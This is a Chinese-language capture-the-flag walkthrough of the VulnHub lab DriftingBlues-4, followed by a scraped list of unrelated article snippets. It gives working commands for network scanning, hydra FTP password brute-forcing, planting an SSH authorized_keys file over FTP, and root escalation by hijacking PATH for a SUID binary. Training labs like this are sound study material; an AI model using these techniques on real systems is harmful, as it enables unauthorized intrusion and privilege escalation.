vulnhub靶场之driftingblues-4

一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested  vtx/amdv enabled. you can contact me by email for troubleshooting or  questions.
This works better with VirtualBox rather than VMware.
 

2.靶场下载

https://www.vulnhub.com/entry/driftingblues-4,661/
 

image-20240219153447919

3.靶场启动

image-20240219153529617

我们不知道靶场ip地址,但是我们知道网段是192.168.1.0/24,我们进行探测即可
 

二.信息收集

1.寻找靶场真实ip

nmap -sP 192.168.1.0/24
 

image-20240219153856132

arp-scan -l
 

image-20240219153943877

靶场的ip地址为192.168.1.10
 

2.探测端口及服务

nmap -p- -sV 192.168.1.10
 

image-20240219154231337

发现开启了21端口, 服务为ftp
发现开启了22端口,服务为OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
发现开启了80端口,服务为Apache httpd 2.4.38 ((Debian))
 

三.渗透测试

1.访问web服务

http://192.168.1.10
 

image-20240219154558941

我们查看页面,没有发现任何有用的信息,我们进行查看源代码,发现一串base64编码,我们一会进行解密查看

image-20240219154703757

开启了21端口,我们进行查看ftp服务,但是不能进行匿名访问

ftp://192.168.1.10
 

image-20240219154817885

2.扫描web服务

1)nikto扫描

nikto -h http://192.168.1.10
 

没有任何信息

2)dirsearch目录扫描

dirsearch -u 192.168.1.10 -e * -x 403 --random-agent
 

image-20240219155336937

什么也没有,目前我们掌握的信息,只有一串base64编码,我们进行解密查看

3.渗透测试

1)解密

我们进行解密base64,一共需要解密4次

Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09
 

image-20240219155604191

我们发现是一个目录,我们进行访问

http://192.168.1.10/imfuckingmad.txt
 

image-20240219155717756

发现是Brainfuck编码,我们进行解密,发现是一个二维码

image-20240219161522517

2)扫描二维码

我们进行扫描

image-20240219161542342

image-20240219161616928

我们发现一个网址,我们进行访问发现4个用户名

https://i.imgur.com/a4JjS76.png
 

image-20240219164140157

在之前我们访问ftp访问的时候,发现需要用户名进行登录,那么我们进行爆破试试

3)hydra爆破

我们使用hydra进行爆破

hydra -L '/home/kali/桌面/1.txt'  -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10 
 

image-20240219172149703

破解出一个 FTP登录的用户名和密码:luther/mypics
 

是 sync(linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块),那我尝试往 ftp 中的 hubert 文件中写入 ssh 密钥,猜测应该就会同步到 hubert 用户的家目录中,现在 ftp 中的 hubert 目录下创建 .ssh 目录

4)制作ssh私钥

首先先在kaii本地生成秘钥ssh-keygen 将 id_rsa.pub SSH公钥文件另存为 authorized_keys

ssh—keygen -t rsa
 

image-20240219174426188

image-20240219174455466

image-20240219180150587

然后我们在hubert目录下创建.ssh目录,我之前就已经创建好了.ssh目录,所以这里就不在创建了

image-20240219180336574

我们上传authorized_keys到靶场里面,我们可以看到上传成功

image-20240219180427738

image-20240219180442341

chmod 400 id_rsa   #给权限
 

5)ssh登录

ssh hubert@192.168.1.10 -i id_rsa
 

我们可以在user.txt里面,看到第一个flag

6)提权

我们使用命令

find / -perm -u=s -type f 2>/dev/null
 

image-20240219183651011

我们可以看到熟悉的getinfo,我们进行提权

执行该程序,根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令

image-20240219183849451

可以通过修改环境来进行命令劫持提权

通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令(在检索环境时会先调用最前面的环境也就是最新写入的环境),来达到提权的效果

export PATH=/tmp/:$PATH             把/tmp路径写入到系统路径中
cd /tmp
echo '/bin/bash' > ip                       把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)
chmod +x ip                                    给ip文件增加执行权限
 

image-20240219184404990

我们可以看到是root提权,我们进行查看flag即可

image-20240219184438188

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/505486.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Segger Embedded Studio IDE使用体验——默认的Section和Linker的设置

Segger Embedded Studio IDE使用体验之一——默认的Section和Linker的设置 一、简介二、操作2.1 编译后代码分析2.1.1 符号浏览器2.1.2 读取elf文件和map文件 2.2 调试2.2.1 查看变量2.2.2 设置供电 2.3 运行环境设置2.3.1 编译器2.3.2 汇编器2.3.3 包含其他文件2.3.4 .bss和.d…

【MATLAB源码-第24期】基于matlab的水声通信中海洋噪声的建模仿真,对比不同风速的影响。

操作环境: MATLAB 2022a 1、算法描述 水声通信: 水声通信是一种利用水中传播声波的方式进行信息传递的技术。它在水下环境中被广泛应用,特别是在海洋科学研究、海洋资源勘探、水下军事通信等领域。 1. **传输媒介**:水声通信利…

Postgresql导出数据和结构后再去另外一个Postgresql数据库中导入失败

参考教程: postgresql 在导入建表sql时 遇到错误 :https://blog.csdn.net/weixin_37706944/article/details/132321731 是因为原表定义了自增字段,解决办法: 解决方法: 执行如下sql后再新建表,就可以了 DR…

ngrok 内网穿透使用

title: ngrok 内网穿透使用 search: 2024-02-29 文章目录 背景Windows安装ngrok指令授权ngrok个人用户Authtoken穿透 http 或 https 服务ngrok的代理http指令ngrok获得静态域名指令ngrok的代理ssh指令 背景 这次寒假回家,很无奈,很多东西放在项目组服务…

[Windows]防火墙,出入站规则失效。

场景: 因为具体需要,在内网中,不想别人发现我们的nacos端口8848,因此我们设置了入站规则,特定的ip地址才能访问。但是实际测试中发现并不起作用。。。 经过一番排查得到一下结果。 为什么有些应用绕过了防火墙配置 有…

记录阿里云服务器VNC登录一直显示Login Incorrect的问题

想要尝试通过VNC实例登录,结果一直提示Login Incorrect 怀疑自己忘记密码后,重置了几次密码还是登录不上去 解决: 发现阿里云把我小键盘的 ""识别为了 “” 号 但是主键盘区域的 键就没有错位 等就是等 加就是加 而小键盘区…

【Linux实验室】配置yum源为ftp服务器

配置yum源为ftp服务器 实验原理 文件传输协议(File Transfer Protocol,FTP)是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传…

专题【链表】刷题日记

2024.03.31 两数相加 题目 给你两个 非空 的链表,表示两个非负的整数。它们每位数字都是按照 逆序 的方式存储的,并且每个节点只能存储 一位 数字。 请你将两个数相加,并以相同形式返回一个表示和的链表。 你可以假设除了数字 0 之外,这两个数都不会以 0 开头。 示例 1:…

【算法-PID】

算法-PID ■ PID■ 闭环原理■ PID 控制流程■ PID 比例环节(Proportion)■ PID 积分环节(Integral)■ PID 微分环节(Differential) ■ 位置式PID,增量式PID介绍■ 位置式 PID 公式■ 增量式 PI…

anaconda navigator updater 版本更新失败

打开后,更新界面持续很久 使用命令行查看版本 执行conda update anaconda-navigator 第一次执行中间失败,重新执行,更新成功

MySQL编程实战LeetCode经典考题

文章简介 本文主要收集了LeetCode上关于MySQL的一些经典考题。 后续也会陆续把所有经典考题补充完整。 175.组合两个表 175.组合两个表 解答: select p.FirstName as firstName, p.LastName as lastName,a.City as city, a.State as state from Person p l…

动手学机器学习双线性模型+习题

在数学中,双线性的含义为,二元函数固定任意一个自变量时,函数关于另一个自变量线性 矩阵分解 设想有N个用户和M部电影,构建一个用户画像库,包含每个用户更偏好哪些类型的特征,以及偏好的程度。假设特征的个…

【数据结构与算法】二叉树的遍历及还原

树形结构 - 有向无环图 树是图的一种。 树形结构有一个根节点树形结构没有回路根节点:A叶子节点:下边没有其他节点了节点:既不是根节点,又不是叶子节点的普通节点树的度:这棵树最多叉的节点有多少叉,这棵树的度就为多少树的深度&#xff1a…

ROS中IMU惯性测量单元

一、IMU惯性测量单元消息包 IMU 是安装在机器人内部的一种传感器模块,用于测量机器人的空间姿态。 IMU的消息包定义在sensor_msgs包中的Imu中。头部是header,记录了消息发送的时间戳和坐标系ID。第二个是角速度。第三个是矢量加速度。三个数据成员都各…

机器学习每周挑战——旅游景点数据分析

数据的截图,数据的说明: # 字段 数据类型 # 城市 string # 名称 string # 星级 string # 评分 float # 价格 float # 销量 int # 省/市/区 string # 坐标 string # 简介 string # 是否免费 bool # 具体地址 string拿到数据…

Godot 4 教程《勇者传说》依赖注入 学习笔记(0):环境配置

文章目录 前言相关地址环境配置初始化环境配置文件夹结构代码结构代码运行 资源文件导入像素风格窗口环境设置背景设置,Tileap使用自动TileMap 人物场景动画节点添加站立节点添加移动动画添加 通过依赖注入获取Godot的全局属性项目声明 当前项目逻辑讲解角色下降添加代码位置问…

MCGS学习——水位控制

要求 插入一个水罐,液位最大值为37插入一个滑动输入器,用来调节水罐水位,滑动输入器最大调节为液位最大值,并能清楚的显示出液位情况用仪表显示水位变化情况,仪表最大显示设置直观清楚方便读数,主划线为小…

CAJViewer8.1下载地址及安装教程

CAJViewer是中国学术期刊(CAJ)全文数据库的专用阅读软件。CAJViewer是中国知识资源总库(CNKI)开发的一款软件,旨在方便用户在线阅读和下载CAJ数据库中的学术论文、期刊和会议论文等文献资源。 CAJViewer具有直观的界面…

Linux系统——Mysql数据库锁的拓展

目录 一、锁的概述 二、锁的分类 1.按锁粒度分类 2.按性能分类 3.按对数据库操作类型 三、全局锁 1.定义 2.操作 3.特点 四、表级锁 1.表级锁分类 2.表锁分类 2.1表共享读锁(read lock) 2.2表独占写锁(write lock) …

随便注【强网杯2019】

大佬的完整wp:buuctf-web-[强网杯 2019]随便注-wp_取材于某次真实环境渗透,只说一句话:开发和安全缺一不可-CSDN博客 知识点: 单引号字符型绕过堆叠注入 可以执行多条语句multi_query():该函数可能引发堆叠注入handler用法 mysql专属&#…